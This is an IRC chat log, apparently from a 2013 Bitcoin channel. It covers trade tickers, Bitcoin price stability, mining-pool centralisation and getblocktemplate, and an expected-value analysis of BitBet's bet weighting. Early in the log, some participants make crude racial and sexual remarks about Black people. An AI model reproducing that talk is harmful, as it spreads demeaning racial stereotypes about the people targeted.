22:08:09 shouldn't matter where they came from Apr 22 22:09:09 we aren't all american citizens here...(i am, not that it matters) Apr 22 22:09:47 orkaa americans are racist in their own peculiar ways. Apr 22 22:09:51 so yeah, it matters sometime. Apr 22 22:11:31 netizen will be more important Apr 22 22:11:33 than citizen Apr 22 22:12:15 internet won't be able to cure our cancer when we're 70 Apr 22 22:12:15 hehe Apr 22 22:12:28 so we either get insanely rich by then Apr 22 22:12:35 or we live in the right country Apr 22 22:13:07 just print a new lung whats the big deal Apr 22 22:13:36 scumbag kakobrekla : prints you a new lung. you had pancreatic cancer. Apr 22 22:13:47 :D Apr 22 22:14:27 mircea_popescu, at least he'd be fair, everyone gets the same deal Apr 22 22:14:29 :)) Apr 22 22:14:36 those laser printers = lung cancer Apr 22 22:14:55 you think that's a fresh smell? that's the toner permeating your lung tissue Apr 22 22:15:09 better to smoke than work in office Apr 22 22:15:16 yeah it does smell nice! Apr 22 22:15:23 cough cough Apr 22 22:16:25 kakobrekla: go hardcore, do lines of different colored toner Apr 22 22:16:42 colors are more powerful? Apr 22 22:16:57 i only have b/w Apr 22 22:17:11 though it doesnt prit white! Apr 22 22:17:13 print Apr 22 22:17:29 https://bitcointalk.org/index.php?topic=183080.msg1913245#msg1913245 Apr 22 22:17:35 [BTCTC] [ASICMINER-PT] 1 @ 1.1489 BTC [+] Apr 22 22:17:49 lol Apr 22 22:18:53 mircea_popescu: romania have blackfolk? Apr 22 22:20:02 jarpiain jborkl_ jcpham jedunnigan JimmyHo2 jMyles joecool joeykrim jurov Apr 22 22:20:02 jarpiain jborkl_ jcpham jedunnigan JimmyHo2 jMyles joecool joeykrim jurov Apr 22 22:20:09 i think they play basketball for the local team...that is not a joke Apr 22 22:20:19 joecool there's a bunch of peeps from africa come to study, there's also a strong gypsy minority. Apr 22 22:20:56 in general actually black people are rare enough that banging a black chick is a sort of personal trophy for any male Apr 22 22:21:17 i imagine they get a pretty sweet self confidence boost by visiting lol Apr 22 22:21:25 lol Apr 22 22:21:54 ;;eauth mircea_popescu Apr 22 22:21:55 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Apr 22 22:22:12 yeah never did that, its bad enough being at a bar and having a giant black ass jackhammer you in the crotch Apr 22 22:22:22 (just sayin) Apr 22 22:22:29 ;;everify freenode:#bitcoin-otc:8658940855a91fd41ff34ec5e2af5634fb5c544400a2488917640e7c Apr 22 22:22:30 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Apr 22 22:22:48 but this is the US, black people in canada are pretty rare and i've never seen a giant one there Apr 22 22:23:01 ;;rate dooglus 2 Does useful things. Apr 22 22:23:02 Rating entry successful. Your rating of 2 for user dooglus has been recorded. Apr 22 22:23:07 in slovenia we elected the first black mayor ever Apr 22 22:23:14 http://www.bbc.co.uk/news/world-europe-11616879 Apr 22 22:23:28 truffles: http://scienceblogs.com/startswithabang/files/2009/09/jimma-with-jackhammer.jpg Apr 22 22:26:07 truffles: nah it's more like a box truck backing up repeatedly into you Apr 22 22:26:20 i guess Apr 22 22:35:58 [BTCTC] [COG.F] 1 @ 2.31 BTC [-] Apr 22 22:37:53 [BTCTC] [ASICMINER-PT] 1 @ 1.1486 BTC [-] Apr 22 22:38:08 [HAVELOCK] [HIM] 1 @ 1.77 BTC [+] Apr 22 22:41:38 [BTCTC] [ASICMINER-PT] 1 @ 1.1488 BTC [+] Apr 22 22:50:35 ;;ticker Apr 22 22:50:35 BTCUSD ticker | Best bid: 125.31057, Best ask: 125.99999, Bid-ask spread: 0.68942, Last trade: 126.00001, 24 hour volume: 66759.35870641, 24 hour low: 115.20000, 24 hour high: 126.60000, 24 hour vwap: 122.13301 Apr 22 22:54:06 heh this stability. Apr 22 23:01:02 [BTCTC] [ASICMINER-PT] 1 @ 1.14999 BTC [+] Apr 22 23:02:07 [HAVELOCK] [VTX] 4 @ 0.42511 = 1.7004 BTC [-] Apr 22 23:06:19 [BTCTC] [ASICMINER-PT] 1 @ 1.1678 BTC [+] Apr 22 23:07:15 [BTCTC] [ASICMINER-PT] 1 @ 1.1679 BTC [+] Apr 22 23:07:20 [BTCTC] [ASICMINER-PT] 2 @ 1.176 = 2.352 BTC [+] Apr 22 23:07:25 [BTCTC] [ASICMINER-PT] 2 @ 1.17686 = 2.3537 BTC [+] Apr 22 23:14:08 [HAVELOCK] [SDICE] 1 @ 0.305 BTC [+] Apr 22 23:16:57 [MPEX] [S.DICE] 190 @ 0.00349995 = 0.665 BTC [+] Apr 22 23:17:44 Well as much as being at that price for about 2 days can be called stability Apr 22 23:18:29 almost 3! Apr 22 23:18:52 is more stable than gold Apr 22 23:19:08 yarly Apr 22 23:19:13 24h volume on gox is a only 68k Apr 22 23:19:15 eheh Apr 22 23:20:07 [HAVELOCK] [VTX] 1 @ 0.46999999 BTC [+] Apr 22 23:20:48 [MPEX] [S.MPOE] 12706 @ 0.00068401 = 8.691 BTC [-] Apr 22 23:20:50 [MPEX] [S.MPOE] 16750 @ 0.00068326 = 11.4446 BTC [-] Apr 22 23:21:00 [MPEX] [S.MPOE] 14452 @ 0.00067796 = 9.7979 BTC [-] Apr 22 23:21:01 [MPEX] [S.MPOE] 5171 @ 0.00067618 = 3.4965 BTC [-] Apr 22 23:24:08 ;;ticker Apr 22 23:24:08 BTCUSD ticker | Best bid: 125.00003, Best ask: 125.09999, Bid-ask spread: 0.09996, Last trade: 125.00003, 24 hour volume: 64124.31164192, 24 hour low: 115.20000, 24 hour high: 126.60000, 24 hour vwap: 122.08643 Apr 22 23:24:16 wow Apr 22 23:24:27 volume cut in half Apr 22 23:25:54 yep... so I would be hesitate to call "all clear" on price stability... Apr 22 23:27:13 [BTCTC] [S.BBET-PT] 35 @ 0.00221 = 0.0774 BTC [+] Apr 22 23:27:32 [BTCTC] [ASICMINER-PT] 1 @ 1.1768 BTC [-] Apr 22 23:28:10 vol is inline with what it was before the pop or poop, whatever you wanna call it Apr 22 23:28:49 not impying anything just observation Apr 22 23:29:29 true, but with so many new accounts at gox, seems very light to me... Apr 22 23:30:05 the line is getting longer but the news are calming, are they de-amling users? Apr 22 23:39:51 [BTCTC] [CRYPTO-TRADE] 4 @ 0.19989 = 0.7996 BTC [+] Apr 22 23:40:32 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Apr 22 23:54:07 [HAVELOCK] [VTX] 1 @ 0.44 BTC [-] Apr 22 23:54:12 [BTCTC] [BITVPS] 10 @ 0.002 = 0.02 BTC [-] Apr 22 23:57:03 [BTCTC] [S.MPOE-PT] 50 @ 0.000693 = 0.0347 BTC [+] Apr 22 23:58:01 [BTCTC] [S.DICE-PT] 11 @ 0.00368 = 0.0405 BTC [+] Apr 22 23:59:25 all the new accounts were for speculation Apr 22 23:59:51 so once the bubble popped it's not surprising that the new accounts don't result in increased volume Apr 23 00:01:05 wonder how much BFL is payinf for all their ads, just saw this on adwords: http://www.butterflylabs.com/landing/landing-aw.php Apr 23 00:04:07 punkman the average scam pays between 1/3 and 1/2 of all net revenuye for advertising Apr 23 00:06:07 [HAVELOCK] [SDICE] 1 @ 0.3025 BTC [-] Apr 23 00:09:05 https://bitcointalk.org/index.php?topic=179098.msg1914050#msg1914050 Apr 23 00:09:06 lol Apr 23 00:11:21 haha jeeze. it makes my eyes bleed some of the stuff i read on there on a daily basis. Apr 23 00:12:33 she must have misunderstood his point :D Apr 23 00:13:39 [MPEX] [S.DICE] 4550 @ 0.00288767 = 13.1389 BTC [-] Apr 23 00:16:08 [HAVELOCK] [SDICE] 1 @ 0.3 BTC [-] Apr 23 00:16:09 [HAVELOCK] [SDICE] 2 @ 0.3 = 0.6 BTC [-] Apr 23 00:16:10 ;;ticker Apr 23 00:16:10 BTCUSD ticker | Best bid: 126.30002, Best ask: 126.49000, Bid-ask spread: 0.18998, Last trade: 126.30001, 24 hour volume: 65465.64089159, 24 hour low: 115.20000, 24 hour high: 127.00000, 24 hour vwap: 122.30066 Apr 23 00:34:06 mod6: whats up! Apr 23 00:34:17 do you know the largest diff jump that has happened so far this year? Apr 23 00:41:26 oh hai! well looks like there was this: http://bitcoin.sipa.be/ Apr 23 00:41:37 err: http://bitcoin.sipa.be/speed-lin-ever.png Apr 23 00:42:17 this one makes me really think hard: http://bitcoin.sipa.be/speed-ever.png Apr 23 00:47:07 [MPEX] [S.MPOE] 2478 @ 0.00068402 = 1.695 BTC [+] Apr 23 00:47:09 [MPEX] [S.MPOE] 7672 @ 0.00069088 = 5.3004 BTC [+] Apr 23 00:50:20 i'm looking at a near ~35% jump in difficulty in around the 23rd of March (if im looking at it correctly): http://bitcoin.sipa.be/speed-lin-10k.png Apr 23 00:55:11 [BTCTC] [ASICMINER-PT] 1 @ 1.17681 BTC [+] Apr 23 00:57:55 ;;bc,estimate Apr 23 00:57:56 Error: "bc,estimate" is not a valid command. Apr 23 00:57:58 bah Apr 23 00:58:24 ;;bc,stats Apr 23 00:58:27 Current Blocks: 232642 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1213 blocks | Next Difficulty In About: 1 week, 0 days, 17 hours, 25 minutes, and 36 seconds | Next Difficulty Estimate: 9617358.12743 | Estimated Percent Change: 7.1656 Apr 23 01:03:00 http://vimeo.com/64582799 Apr 23 01:30:05 so everyone mines btcguild now or what? Apr 23 01:31:05 oh i guess this graph in thumbnail form looked like a lot closer to 50%: http://blockchain.info/pools?timespan=24hrs Apr 23 01:32:47 http://imgur.com/d9jpLqY Apr 23 01:35:25 i cant belive im saying this but theres space for new pools Apr 23 01:36:24 That would be tough to do kakobrekla, this community trusts no one and rightfully so not to mention all the pools seem to go bankrupt Apr 23 01:36:38 They would also need to offer something new and exciting to get people to move Apr 23 01:36:59 nah, all you need is a nice site and a nice name like kakobrekla Apr 23 01:36:59 Although I do agree it seems like we need some more new choices Apr 23 01:37:30 hehe , are you making a pool? Apr 23 01:37:34 look at deepbit Apr 23 01:37:38 stuck in 1988 Apr 23 01:38:19 It looks like its finally dying off Apr 23 01:38:20 [MPEX] [S.MPOE] 2100 @ 0.00067618 = 1.42 BTC [-] Apr 23 01:38:21 i hope all pools go bankrupt tbh Apr 23 01:38:24 miners are becoming the apple idiots Apr 23 01:38:34 kako, if you make an ltc pool i'd move there :) Apr 23 01:38:37 they are buying hashers in nice cases and shit Apr 23 01:38:44 they want preety charts and shit like dat Apr 23 01:39:01 I dont care what it looks like, I just want TH speed Apr 23 01:39:26 im not making any pool, just saying Apr 23 01:39:38 mircea_popescu why the hate Apr 23 01:40:05 he prefers people solo mine? Apr 23 01:40:07 i don't like pools because basically they fuck up the entire point of mining Apr 23 01:40:24 that said obviously they're unavoidable. Apr 23 01:41:24 it aint all bad, if no pools would be online Apr 23 01:41:29 hashrate would be much lower Apr 23 01:41:34 how do you figure ? Apr 23 01:41:54 cause a ton of people wouldnt mine under solo conditions Apr 23 01:42:14 this is an interesting point Apr 23 01:42:26 I dunno p2pool seemed good but no one uses it, decentralized mining. Apr 23 01:42:30 same problem as with gox Apr 23 01:42:36 you need to spread the points Apr 23 01:42:37 Doffx i wonder why that is. Apr 23 01:42:47 you dont need 100k , but 5 is not enough Apr 23 01:43:24 I used it but it felt like I was losing BTC doing so, there were so many other options that made me slight more Apr 23 01:43:43 cause of stales ? Apr 23 01:43:46 err slightly more, my reason was well.. I am greedy to a point? Apr 23 01:44:00 basically the new protocol from Luke-Jr fucked it all up Apr 23 01:44:10 if we would be stuck with getwork Apr 23 01:44:13 asic would have to run solos Apr 23 01:44:25 now they are pooling too Apr 23 01:45:12 p2pool seemed to be disliked by a lot of the developer types for some reason Apr 23 01:45:22 Kano didn’t like it either. Apr 23 01:45:30 what's luke to do with that ?! Apr 23 01:45:32 kakobrekla: don't be stupid Apr 23 01:45:43 its what i do! Apr 23 01:45:57 kakobrekla: I intentionally designed the new protocol so that it SOLVED the pooled mining centralization problem Apr 23 01:46:24 by pluging asics in a pool? Apr 23 01:46:27 good job! Apr 23 01:46:39 kakobrekla: by taking the blind control away from pools Apr 23 01:46:46 putting it back with the miners Apr 23 01:46:46 I haven’t seen anything about this new protocol, is there a post about it someplace? Apr 23 01:46:58 [MPEX] [S.MPOE] 6450 @ 0.00069088 = 4.4562 BTC [+] Apr 23 01:46:59 https://en.bitcoin.it/wiki/Getblocktemplate Apr 23 01:47:11 Thanks. Apr 23 01:47:29 im sure the reason btcguild is trying to get rid of miners is because its all safe and good Apr 23 01:47:29 how is gbt new even Apr 23 01:47:36 well "new" Apr 23 01:47:43 kakobrekla: BTCGuild/slush made their own protocol which un-solved the problem Apr 23 01:47:44 its newer than getwork Apr 23 01:47:51 ah Apr 23 01:47:52 kakobrekla: they apparently WANT centralization Apr 23 01:47:54 yours was rejected Apr 23 01:47:55 anyway, stratum seems pretty much the standard. Apr 23 01:48:02 kakobrekla: not really, just by the big centralized pools Apr 23 01:48:04 gbt didn't manage to get much traction iirc. Apr 23 01:48:08 so, rejected. Apr 23 01:48:08 kakobrekla: most of the smaller pools support GBT Apr 23 01:48:17 omg. Apr 23 01:48:28 hopefully more ASIC miners will get off centralized pools Apr 23 01:48:37 no clue why they're all going onto BTCGuild Apr 23 01:49:01 to help him out cause of hack Apr 23 01:49:06 … Apr 23 01:49:16 are you confusing BTCG vs ozcoin? Apr 23 01:49:20 its because menstruation is murder Apr 23 01:50:17 guild lost coins Apr 23 01:50:20 not long ago Apr 23 01:50:29 ah that was split + hack or something Apr 23 01:50:30 no Apr 23 01:50:35 … Apr 23 01:50:35 split + lameness Apr 23 01:50:39 anyhway. getwork was a pos. Apr 23 01:50:39 that was it Apr 23 01:50:50 no way anyone was sticking with it. Apr 23 01:50:56 kakobrekla: they lost nothing from the split, Gavin gave them what they would have mined Apr 23 01:51:03 mircea_popescu: tell Tycho/Deepbit Apr 23 01:51:06 dafuck Apr 23 01:51:09 [BTCTC] [BTC-BOND] 9 @ 0.01001 = 0.0901 BTC [+] Apr 23 01:51:09 mircea_popescu: he still doesn't support rollntime Apr 23 01:51:27 hey gavin i lost 100k ... can i has? Apr 23 01:51:28 Luke-Jr deepbit doesn't want to upgrade because generally speaking updates are also shit. Apr 23 01:51:34 kakobrekla: BTCGuild *did* lose a bit when they upgraded to 0.8 because the admin wasn't paying attention to what he was doing Apr 23 01:51:41 BTCG lost coins by mistake Apr 23 01:51:42 no hack Apr 23 01:51:49 mircea_popescu: they don't have to upgrade to use rollntime Apr 23 01:52:11 they're on 3.4 or some shit Apr 23 01:52:17 0.3.21 Apr 23 01:52:24 3.2 mk Apr 23 01:52:34 but rollntime isn't done at bitcoind, it's done at the poolserver Apr 23 01:53:07 ya but there's somesort of conflict or something Apr 23 01:53:09 What happens if someone decided to plop 200+ GH worth of Asic on Deepbit Apr 23 01:53:12 does it go boom? Apr 23 01:53:16 mircea_popescu: nope Apr 23 01:53:27 Doffx: you can't even put 20 Gh/s of GPUs without it going boom Apr 23 01:53:28 doffx, i assume you eant TH Apr 23 01:53:50 oh deepbit, nvm Apr 23 01:53:52 No Gh, mainly because I know they only really work with Stratum pools Apr 23 01:54:02 Because of how fast they getwork I think Apr 23 01:54:07 Doffx: and GBT Apr 23 01:54:22 I see that after reading the wiki Apr 23 01:54:34 GBT has been around a long time, even when I started 2 years ago Apr 23 01:54:45 ya it's "new" Apr 23 01:54:49 not that long lol Apr 23 01:55:15 Created: 28-02-2012 Apr 23 01:55:28 I thought I remember seeing it way back I am probably wrong mainly because this is the first time I understood what it even meant. Apr 23 01:55:42 Oh so little over a year Apr 23 01:55:57 so basically other than eclipse who exactly even uses gbt ? Apr 23 01:56:10 https://en.bitcoin.it/wiki/Getblocktemplate#For_miners Apr 23 01:56:13 Bitminter, elegius Apr 23 01:56:31 eligius too Apr 23 01:56:33 so the pool can still feed you template from a forked chain Apr 23 01:56:36 right Apr 23 01:56:40 ;;nethash Apr 23 01:56:41 71767.6896568 Apr 23 01:56:49 Wow 71 Apr 23 01:56:50 ;;estimate Apr 23 01:56:51 Next difficulty estimate | 9612397.38912 based on data since last change | 10025677.4438 based on data for last three days Apr 23 01:57:24 Luke-Jr, which asic companies are hashing on the side? Apr 23 01:57:24 a ok bitminter. Apr 23 01:57:32 ThickAsThieves: Avalon and ASICMiner at least Apr 23 01:57:42 Luke-Jr: so the pool can still feed you template from a forked chain? Apr 23 01:57:42 BFL is apparently doing a "demo" jalapeno Apr 23 01:58:04 kakobrekla: could; miners are expected to be smart and detect such things Apr 23 01:58:18 kakobrekla: bitcoind and p2pool can feed you a forked template too Apr 23 01:58:45 so you solved nothing. Apr 23 01:59:12 pools no longer can do nasty stuff behind miners' backs Apr 23 01:59:17 that was the problem all along Apr 23 01:59:46 I didnt even know about Bitpenny Apr 23 02:01:13 nobody did :/ Apr 23 02:01:25 apparently they're now centralizing their pool and going stratum-only :/ Apr 23 02:01:56 anyone can get http://markets.blockchain.info/ ? Apr 23 02:02:24 I can't Apr 23 02:02:30 same Apr 23 02:03:24 hm Apr 23 02:04:39 I dont think most miner even know what GBT is. Apr 23 02:04:52 guys anyone recognized the s/s Apr 23 02:04:52 Does p2pool even work with Asics? Apr 23 02:04:52 http://i.imgur.com/DRb5Ydu.png Apr 23 02:05:07 which site is the account from Apr 23 02:05:14 [BTCTC] [GSDPT] 2 @ 0.00385 = 0.0077 BTC [+] Apr 23 02:06:02 Doffx: using GBT doesn't require any extra effort from the miners like stratum does :p Apr 23 02:06:12 That looks like some sort of custom mining app, I have never seen that before and I think I have tried just about every pool Apr 23 02:06:23 thats 50BTC's app Apr 23 02:06:35 in that jpg Apr 23 02:06:37 50btc lol k Apr 23 02:06:46 whats the p for Apr 23 02:06:52 ya! Apr 23 02:06:54 this kid was claiming he mined it all on 1 day Apr 23 02:06:55 lol Apr 23 02:07:07 Lol, you know what, I have never used 50btc Apr 23 02:07:17 P must be like PPCoin or whatever Apr 23 02:07:28 ah Apr 23 02:07:49 Well, Luke-Jr seems like it makes sense to use, however you would somehow need to convince the miners to use it. Apr 23 02:08:14 Forcing the pools would also be difficult, not sure why they decided to use Stratum however Apr 23 02:08:20 Doffx: anyone mining with BFGMiner will automatically use GBT if the pool supports it (unless they specifically set stratum) Apr 23 02:08:33 ya but nobody mines with bfgminer Apr 23 02:08:37 That's good to know. Apr 23 02:09:05 I would use it if he could figure out why I lose 800 MH over time with my Cainsmore :P Apr 23 02:09:42 Doffx: because the freq drops? Apr 23 02:10:17 Why though, it doesent drop in MPBM, it stays the same indefinitely as far as I can tell. Apr 23 02:10:26 in other centralisation news, http://blockchain.info/pools?timespan=24hrs Apr 23 02:10:35 btc + slush just enough over 50% Apr 23 02:10:53 Doffx: drops are triggered by hw errors usually Apr 23 02:11:00 Doffx: maybe the balance is off Apr 23 02:11:07 I seem to get more in Bfgminer then Apr 23 02:11:24 the clocks stablize in MPBM and then never change once they reach the spot they like Apr 23 02:11:25 wtf is wrong with gox today anyway Apr 23 02:11:35 only API trades alloweD? Apr 23 02:12:05 I wish I was able to help you more Luke-Jr but I honestly dont understand it. Apr 23 02:13:05 ThickAsThieves next they implement gpg Apr 23 02:13:21 fat chance Apr 23 02:13:30 wait, he is fat Apr 23 02:13:32 hmm Apr 23 02:18:09 ;;ticker Apr 23 02:18:10 BTCUSD ticker | Best bid: 125.74001, Best ask: 126.43000, Bid-ask spread: 0.68999, Last trade: 126.43000, 24 hour volume: 63681.08188621, 24 hour low: 115.20000, 24 hour high: 127.30000, 24 hour vwap: 122.64010 Apr 23 02:18:25 it aint a thing if it aint got that swing Apr 23 02:26:31 ls Apr 23 02:27:06 . Apr 23 02:27:07 .. Apr 23 02:27:56 ls -a Apr 23 02:28:26 yeah yeah Apr 23 02:28:54 -la accually. Apr 23 02:32:06 or -lah so we can see the symlinks? Apr 23 02:33:21 h makes size human readable Apr 23 02:34:15 -latex so it's all sexy smooth. Apr 23 02:38:45 omg Apr 23 02:38:45 https://bitcointalk.org/index.php?topic=174620.msg1911371#msg1911371 Apr 23 02:38:56 what is this indian malarkey, its missing skateboards Apr 23 02:40:54 basically the guy is daydreaming. Apr 23 02:41:31 kids often do this, "what if i were the emperor of Rome" or "what if i was the only person in town" etc. Apr 23 02:46:21 [MPEX] [S.MPOE] 27500 @ 0.00067915 = 18.6766 BTC [-] Apr 23 02:48:25 [BTCTC] [BTC-BOND] 5 @ 0.009911 = 0.0496 BTC [-] Apr 23 02:48:29 [BTCTC] [BTC-BOND] 1 @ 0.009911 BTC [-] Apr 23 02:48:36 [BTCTC] [BTC-BOND] 16 @ 0.00991 = 0.1586 BTC [-] Apr 23 02:48:39 [BTCTC] [BTC-BOND] 3 @ 0.009901 = 0.0297 BTC [-] Apr 23 02:48:42 [BTCTC] [BTC-BOND] 20 @ 0.0099 = 0.198 BTC [-] Apr 23 02:48:45 [BTCTC] [BTC-BOND] 1 @ 0.00989 BTC [-] Apr 23 02:48:48 [BTCTC] [BTC-BOND] 1 @ 0.00986 BTC [-] Apr 23 02:48:51 [BTCTC] [BTC-BOND] 1 @ 0.00986 BTC [-] Apr 23 02:48:53 [BTCTC] [BTC-BOND] 4 @ 0.009855 = 0.0394 BTC [-] Apr 23 02:48:56 [BTCTC] [BTC-BOND] 4 @ 0.0098 = 0.0392 BTC [-] Apr 23 02:48:59 [BTCTC] [BTC-BOND] 6 @ 0.0098 = 0.0588 BTC [-] Apr 23 02:49:03 [BTCTC] [BTC-BOND] 633 @ 0.00976 = 6.1781 BTC [-] Apr 23 03:00:04 this is getting hilarious https://bitcointalk.org/index.php?topic=183088.0 Apr 23 03:00:19 Starting a trade site? > I have two domains available to me, so it only makes sense to use one for trading. Apr 23 03:00:48 the logic. Apr 23 03:01:00 makes perfect sense to me Apr 23 03:04:23 https://bitcointalk.org/index.php?topic=181982.0 Apr 23 03:11:09 [HAVELOCK] [HIM] 1 @ 1.81999999 BTC [+] Apr 23 03:15:02 http://polimedia.us/dtng/c/src/136667606120.jpg Apr 23 03:15:10 there's a deluge of idiots Apr 23 03:21:27 who are you responding to? Apr 23 03:21:52 [BTCTC] [ASICMINER-PT] 1 @ 1.1301 BTC [-] Apr 23 03:21:55 [BTCTC] [ASICMINER-PT] 1 @ 1.127175 BTC [-] Apr 23 03:22:32 http://www.247btc.com/bitcoins/134/how-i-would-manipulate-the-bitcoin-exchange-market-and-how-a-discrete-double-auction-could-stop-me/#comment-142 Apr 23 03:22:43 o hey, the 140th comment on his site. go me. Apr 23 03:22:45 ty Apr 23 03:22:57 it's a stupid suggestion of course Apr 23 03:23:01 lets make market slow and inefficient Apr 23 03:23:17 that makes it better Apr 23 03:23:19 that's not even it. Apr 23 03:23:31 what offends me is this "i am a teenage cock with no experience whatsoever Apr 23 03:23:42 therefore let me tell you how things are and how'd they be better" Apr 23 03:23:56 then proceeds to describe the cubical red sky Apr 23 03:23:57 =D Apr 23 03:24:30 who the fuck even heard of exchange settling a 80 bid and 90 ask at 85 ?! Apr 23 03:24:48 not even him. but that's okay cause he goes back and puts an "usually" in paranthesis there. problem fixed. Apr 23 03:24:55 fucking taken out and shot ffs. Apr 23 03:25:00 well that actually happens Apr 23 03:25:09 opening acutions right before the market opens Apr 23 03:25:33 oh well okay the prices would have to intersect Apr 23 03:25:37 it almost never happens. Apr 23 03:25:51 even if it's a situation of loaded book, they're settled by fixing Apr 23 03:25:55 which means volume matters too Apr 23 03:26:10 it's just... superficial nonsense of cluelessness Apr 23 03:27:34 http://www.nyse.com/equities/nysearcaequities/1157623605117.html Apr 23 03:28:21 "The Opening Auction will occur at the Indicative Match Price — the price at which the maximum volume of orders is executable at the time of the auction" Apr 23 03:28:35 you know ? volume matters too. it ain't 85. Apr 23 03:28:48 yea Apr 23 03:29:14 this is what i'm saying, things are what they are not what some dood gleaned from 15 minutes of skimming wikipedia. Apr 23 03:31:09 nice link tho Apr 23 03:32:20 ;;ticker Apr 23 03:32:21 BTCUSD ticker | Best bid: 128.79001, Best ask: 128.59143, Bid-ask spread: -0.19858, Last trade: 128.99990, 24 hour volume: 60612.58053853, 24 hour low: 119.21210, 24 hour high: 128.89000, 24 hour vwap: 123.57448 Apr 23 03:49:00 [BTCTC] [ASICMINER-PT] 1 @ 1.11101 BTC [-] Apr 23 03:49:03 [BTCTC] [ASICMINER-PT] 1 @ 1.111 BTC [-] Apr 23 03:49:06 [BTCTC] [ASICMINER-PT] 1 @ 1.111 BTC [-] Apr 23 03:49:09 [BTCTC] [ASICMINER-PT] 3 @ 1.11 = 3.33 BTC [-] Apr 23 03:53:36 hey mp, why do you prefer to decay the weight (or allow originator to set the decay) for bitbet? I've been doing some analysis and it really creates a heavy skews favoring early betting. Apr 23 03:54:33 early betting bets blind Apr 23 03:56:22 I get that, but decaying by 5 orders of magnitude seems extreme Apr 23 03:56:47 only 2 in any practical sense Apr 23 03:57:41 right, but still... there are open bets where there's like -40% EV - people stop betting... Apr 23 03:57:55 link one ? Apr 23 03:58:28 http://bitbet.us/bet/329/btc-network-difficulty-tops-10-million-by-end/ Apr 23 03:59:08 which side is -40 EV ? Apr 23 03:59:08 EV on this one is -44% Apr 23 03:59:32 collectively Apr 23 03:59:44 assume I bet on both sides Apr 23 03:59:48 that makes no sense. Apr 23 03:59:51 o, you mean jointly. Apr 23 04:00:00 yes Apr 23 04:00:10 that how you compute EV Apr 23 04:00:43 ;;calc 0.99* 44.69/89.87 * 0.06753 + .99 Apr 23 04:00:44 1.02324509339 Apr 23 04:00:50 ;;calc 0.99* 89.87/44.69 * 0.06753 + .99 Apr 23 04:00:51 1.12444242311 Apr 23 04:01:02 seems it's ~7% ev Apr 23 04:01:18 no Apr 23 04:01:55 a nm it's by the weight pools Apr 23 04:02:30 ;;calc 0.99* 89.87* ( 6753/5116522) + .99 Apr 23 04:02:31 1.10742804759 Apr 23 04:02:57 ;;calc 0.99* 44.69* ( 6753/2369410) + .99 Apr 23 04:02:58 1.11609622408 Apr 23 04:03:06 heh. 11% ? Apr 23 04:03:58 if I bet 1 on yes AND on no I will win either 1.05 or 1.26 Apr 23 04:04:20 did i get it backwards still ? Apr 23 04:04:26 ;;calc 0.99* 44.69* ( 6753/5116522) + .99 Apr 23 04:04:27 1.04839389615 Apr 23 04:04:28 so I bet 2 BTC to return either 1.05 or 1.26 Apr 23 04:04:39 ~40% Apr 23 04:04:43 ;;calc 0.99* 89.87* ( 6753/2369410) + .99 Apr 23 04:04:44 1.24357502032 Apr 23 04:05:03 i get 1.04 and 1.24 must be you made your calc at earlier weight ? Apr 23 04:05:12 close enough Apr 23 04:05:22 alrgiht so we have confirmation on the numbers at least. Apr 23 04:05:29 lol Apr 23 04:05:36 the idea is to marketmake early not late. Apr 23 04:05:37 I bet 2 to win EITHER 1.04 OR 1.24 Apr 23 04:05:50 in this case, ~94% of the time for this bet is past. Apr 23 04:06:19 so I worked out a close appoximation for EV Apr 23 04:06:45 yea Apr 23 04:06:47 if you look at avg weight (total weight / total bets) Apr 23 04:07:18 then EV = (CurrentWeight - AvgWeight)/(2 * AvgWeight) - .01 Apr 23 04:07:34 for small bets relative to the whole Apr 23 04:08:00 lemme do the math for this Apr 23 04:09:16 pretty sure it's right Apr 23 04:11:14 i'm getting Apr 23 04:11:15 0.2475 * curr_weight * (no_pool/yes_weight + yes_pool/no_weight) + .495 Apr 23 04:11:55 wheres the sqrt(log()) Apr 23 04:12:02 the good news being that you're guaranteed half your money back no matter what Apr 23 04:12:09 which makes this eerly familiar to mpoe bond Apr 23 04:12:22 lol Apr 23 04:13:55 anyway. there's incentive for you to do this type of bet (ie, a marketmaking bet) early in the bet's life. Apr 23 04:14:06 this is deliberate, as it helps the casual player. Apr 23 04:14:41 basically you can make a little % by financing the odds. so you can pretty much run a line bookie thing on top of bitbet. Apr 23 04:14:47 [MPEX] [S.MPOE] 8900 @ 0.00068694 = 6.1138 BTC [+] Apr 23 04:14:52 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Apr 23 04:15:04 exactly... Apr 23 04:15:17 just wanted to confirm the analysis Apr 23 04:15:37 i think it's confirmed Apr 23 04:16:04 for popular bets the it can be an significant incentive Apr 23 04:16:18 well ideally we want popular bets anyhow. Apr 23 04:16:24 rather than clutter. Apr 23 04:17:04 I was surprised, though, at just how BAD the odds can get. Perhaps you should consider a minimum decay value Apr 23 04:17:22 i wouldn't say the odds are bad. Apr 23 04:17:32 why would you be betting both sides 95% of the time in ? Apr 23 04:17:52 the fact that either side is still +EV seems pretty good to me. means if you have a conviction you can still take a side. Apr 23 04:18:17 at 10,000 weight with pool average of 50,000... that's terrible EV... The pool should be closed or EV disclosed... Apr 23 04:19:30 just saying that maybe a decay minimum of 20,000 would be appropriate... Apr 23 04:20:40 the problem, ultimately, will be PR. As more people bet, others will come to the same conclusions - people will talk shit about bitbet and you didn't even get to benefit from any of that negative EV... Apr 23 04:21:40 [MPEX] [S.MPOE] 3750 @ 0.00069088 = 2.5908 BTC [+] Apr 23 04:24:33 but listen, on one hand this is disclosed Apr 23 04:24:41 ie, bet says what your wright is, and what the minimum is Apr 23 04:24:58 on the other, it's fully setable, min can be 100k or anything down to 1 Apr 23 04:28:59 yes, but could be a bit more transparent - i found it confusing at first. Apr 23 04:29:40 I know that it's settable, just suggesting a firm minimum so that EV can never get to far out of whack. Apr 23 04:33:25 like maybe display average pool weight - stuff so they can compute something round in their head and not have to resort to a calculator Apr 23 04:33:41 w/e just a suggestion Apr 23 04:34:29 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Apr 23 04:34:38 smth in that sense will be added in teh new interface Apr 23 04:35:31 not sure if avg pool weight will help avg user though Apr 23 04:35:31 [BTCTC] [COGNITIVE] 7 @ 0.191 = 1.337 BTC [+] Apr 23 04:36:46 